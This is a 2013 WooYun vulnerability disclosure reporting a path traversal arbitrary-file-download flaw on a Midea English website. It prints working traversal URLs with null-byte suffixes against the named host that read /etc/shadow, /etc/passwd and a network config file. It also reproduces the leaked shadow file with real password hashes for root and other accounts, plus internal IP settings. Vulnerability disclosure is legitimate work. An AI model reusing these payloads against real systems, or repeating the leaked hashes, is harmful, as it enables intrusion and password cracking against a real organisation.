漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039940
漏洞标题:美的某英文网站任意文件遍历下载漏洞导致shadow等文件泄露
相关厂商:midea.com
漏洞作者: 霍大然
提交时间:2013-10-17 16:00
修复时间:2013-12-01 16:01
公开时间:2013-12-01 16:01
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:11
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-17: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向核心白帽子及相关领域专家公开
2013-11-06: 细节向普通白帽子公开
2013-11-16: 细节向实习白帽子公开
2013-12-01: 细节向公众公开
简要描述:
root权限导致shadow等文件可被下载
详细说明:
问题站点:
http://global.midea.com.cn/midea/
看到有两个文件:download.jsp与FileView,但download没有测试成功,FileView可用:
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/shadow%00.jpg
会看到有个图片:
下载图片用记事本打开:
root:$1$MiYaiGJD$YjEG1eOtDo0kz/oytKc.w1:15684:0:99999:7:::
bin:*:13842:0:99999:7:::
daemon:*:13842:0:99999:7:::
adm:*:13842:0:99999:7:::
lp:*:13842:0:99999:7:::
sync:*:13842:0:99999:7:::
shutdown:*:13842:0:99999:7:::
halt:*:13842:0:99999:7:::
mail:*:13842:0:99999:7:::
news:*:13842:0:99999:7:::
uucp:*:13842:0:99999:7:::
operator:*:13842:0:99999:7:::
games:*:13842:0:99999:7:::
gopher:*:13842:0:99999:7:::
ftp:*:13842:0:99999:7:::
nobody:*:13842:0:99999:7:::
dbus:!!:13842:0:99999:7:::
vcsa:!!:13842:0:99999:7:::
rpm:!!:13842:0:99999:7:::
haldaemon:!!:13842:0:99999:7:::
netdump:!!:13842:0:99999:7:::
nscd:!!:13842:0:99999:7:::
sshd:!!:13842:0:99999:7:::
rpc:!!:13842:0:99999:7:::
mailnull:!!:13842:0:99999:7:::
smmsp:!!:13842:0:99999:7:::
rpcuser:!!:13842:0:99999:7:::
nfsnobody:!!:13842:0:99999:7:::
pcap:!!:13842:0:99999:7:::
apache:!!:13842:0:99999:7:::
squid:!!:13842:0:99999:7:::
webalizer:!!:13842:0:99999:7:::
xfs:!!:13842:0:99999:7:::
ntp:!!:13842:0:99999:7:::
gdm:!!:13842:0:99999:7:::
pegasus:!!:13842:0:99999:7:::
htt:!!:13842:0:99999:7:::
amanda:!!:13842:0:99999:7:::
mideaweb:$1$XKjbr6gk$J0i8zKZ9EnbiUzjHPegXh0:14125:0:99999:7:::
mysql:!!:14125:0:99999:7:::
mon:$1$iYho7hfh$k2EgB1X3Ls5L1F9E3e4Xk.:15523:0:99999:7:::
mysql5:!!:15348:0:99999:7:::
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/passwd%00.jpg
漏洞证明:
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg
DEVICE=eth0
ONBOOT=yes
BOOTPROTO=none
IPADDR=172.16.16.38
NETMASK=255.255.255.0
GATEWAY=172.16.16.1
TYPE=Ethernet
USERCTL=no
IPV6INIT=no
PEERDNS=yes
修复方案:
参数过滤
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2013-10-17 16:45
厂商回复:
应用代码存在缺陷,核实后第一时间加固处理。
最新状态:
暂无